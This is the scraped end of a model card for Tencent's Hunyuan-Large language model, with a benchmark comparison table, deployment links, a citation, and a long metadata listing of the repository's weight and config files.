| 123 |
+
| C-Eval | - | - | 60.0 | - | **88.6** |
|
| 124 |
+
| BBH | - | - | 78.4 | 84.3 | **89.5** |
|
| 125 |
+
| HellaSwag | - | - | 86.0 | **90.3** | 88.5 |
|
| 126 |
+
| ARC-C | **96.9** | 94.8 | 90.0 | - | 94.6 |
|
| 127 |
+
| GPQA_diamond | **51.1** | 46.7 | - | - | 42.4 |
|
| 128 |
+
| MATH | 73.8 | 68.0 | 49.8 | 74.7 | **77.4** |
|
| 129 |
+
| HumanEval | 89.0 | 80.5 | 75.0 | 89.0 | **90.0** |
|
| 130 |
+
| AlignBench | 6.0 | 5.9 | 6.2 | 8.0 | **8.3** |
|
| 131 |
+
| MT-Bench | 9.1 | 8.8 | 8.1 | 9.0 | **9.4** |
|
| 132 |
+
| IFEval strict-prompt | **86.0** | 83.6 | 71.2 | - | 85.0 |
|
| 133 |
+
| Arena-Hard | 69.3 | 55.7 | - | 76.2 | **81.8** |
|
| 134 |
+
| AlpacaEval-2.0 | 39.3 | 34.3 | 30.9 | 50.5 | **51.8** |
|
| 135 |
+
|
| 136 |
+
|
| 137 |
+
## Quick Start
|
| 138 |
+
|
| 139 |
+
You can quickly get started by referring to the content in the <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large/tree/main/examples"">Quick Start Guide</a>.
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
## Inference and Deployment
|
| 143 |
+
|
| 144 |
+
HunyuanLLM uses TRT-LLM and vLLM for deployment. We are open sourcing the vLLM deployment (see Reasoning with vLLM), and the TRT-LLM deployment (see Reasoning with TRT-LLM) will be available in the near future.
|
| 145 |
+
|
| 146 |
+
Learn More at <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large"">Tencent-Hunyuan-Large</a>.
|
| 147 |
+
|
| 148 |
+
|
| 149 |
+
### Citation
|
| 150 |
+
If you find our work helpful, feel free to give us a cite.
|
| 151 |
+
|
| 152 |
+
```
|
| 153 |
+
@misc{sun2024hunyuanlargeopensourcemoemodel,
|
| 154 |
+
title={Hunyuan-Large: An Open-Source MoE Model with 52 Billion Activated Parameters by Tencent},
|
| 155 |
+
author={Xingwu Sun and Yanfeng Chen and Yiqing Huang and Ruobing Xie and Jiaqi Zhu and Kai Zhang and Shuaipeng Li and Zhen Yang and Jonny Han and Xiaobo Shu and Jiahao Bu and Zhongzhi Chen and Xuemeng Huang and Fengzong Lian and Saiyong Yang and Jianfeng Yan and Yuyuan Zeng and Xiaoqin Ren and Chao Yu and Lulu Wu and Yue Mao and Tao Yang and Suncong Zheng and Kan Wu and Dian Jiao and Jinbao Xue and Xipeng Zhang and Decheng Wu and Kai Liu and Dengpeng Wu and Guanghui Xu and Shaohua Chen and Shuang Chen and Xiao Feng and Yigeng Hong and Junqiang Zheng and Chengcheng Xu and Zongwei Li and Xiong Kuang and Jianglu Hu and Yiqi Chen and Yuchi Deng and Guiyang Li and Ao Liu and Chenchen Zhang and Shihui Hu and Zilong Zhao and Zifan Wu and Yao Ding and Weichao Wang and Han Liu and Roberts Wang and Hao Fei and Peijie She and Ze Zhao and Xun Cao and Hai Wang and Fusheng Xiang and Mengyuan Huang and Zhiyuan Xiong and Bin Hu and Xuebin Hou and Lei Jiang and Jiajia Wu and Yaping Deng and Yi Shen and Qian Wang and Weijie Liu and Jie Liu and Meng Chen and Liang Dong and Weiwen Jia and Hu Chen and Feifei Liu and Rui Yuan and Huilin Xu and Zhenxiang Yan and Tengfei Cao and Zhichao Hu and Xinhua Feng and Dong Du and Tinghao She and Yangyu Tao and Feng Zhang and Jianchen Zhu and Chengzhong Xu and Xirui Li and Chong Zha and Wen Ouyang and Yinben Xia and Xiang Li and Zekun He and Rongpeng Chen and Jiawei Song and Ruibin Chen and Fan Jiang and Chongqing Zhao and Bo Wang and Hao Gong and Rong Gan and Winston Hu and Zhanhui Kang and Yong Yang and Yuhong Liu and Di Wang and Jie Jiang},
|
| 156 |
+
year={2024},
|
| 157 |
+
eprint={2411.02265},
|
| 158 |
+
archivePrefix={arXiv},
|
| 159 |
+
primaryClass={cs.CL},
|
| 160 |
+
url={https://arxiv.org/abs/2411.02265},
|
| 161 |
+
}
|
| 162 |
+
```
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
","{""id"": ""tencent/Tencent-Hunyuan-Large"", ""author"": ""tencent"", ""sha"": ""023bb217c7f4fdfabd7308a344994b0e9ac7359c"", ""last_modified"": ""2025-01-19 05:30:33+00:00"", ""created_at"": ""2024-10-22 14:27:04+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 153, ""downloads_all_time"": null, ""likes"": 587, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""text-generation"", ""en"", ""arxiv:2411.02265"", ""license:other"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: tencent-license\nlicense_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt\npipeline_tag: text-generation"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00001-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00002-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00003-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00004-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00005-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00006-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00007-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00008-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00009-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00010-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00011-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00012-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00013-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00014-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00015-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00016-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00017-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00018-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00019-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00020-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00021-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00022-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00023-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00024-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00025-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00026-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00027-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00028-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00029-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00030-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00031-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00032-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00033-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00034-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00035-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00036-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00037-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00038-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00039-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00040-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00041-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00042-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00043-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00044-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00045-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00046-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00047-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00048-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00049-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00050-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00051-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00052-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00053-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00054-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00055-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00056-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00057-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00058-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00059-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00060-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00061-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00062-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00063-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00064-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00065-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00066-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00067-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00068-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00069-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00070-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00071-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00072-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00073-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00074-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00075-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00076-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00077-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00078-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00079-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00080-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00001-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00002-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00003-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00004-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00005-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00006-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00007-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00008-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00009-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00010-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00011-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00012-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00013-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00014-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00015-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00016-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00017-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00018-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00019-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00020-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00021-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00022-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00023-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00024-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00025-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00026-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00027-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00028-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00029-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00030-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00031-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00032-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00033-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00034-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00035-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00036-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00037-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00038-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00039-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00040-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00041-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00042-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00043-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00044-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00045-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00046-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00047-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00048-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00049-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00050-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00051-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00052-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00053-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00054-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00055-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00056-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00057-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00058-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00059-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00060-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00061-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00062-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00063-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00064-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00065-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00066-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00067-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00068-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00069-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00070-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00071-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00072-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00073-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00074-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00075-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00076-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00077-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00078-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00079-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00080-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/test.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/test4consistent.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/__init__.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/generation_config.json', size=None, blob_id=None, lfs=None)"", 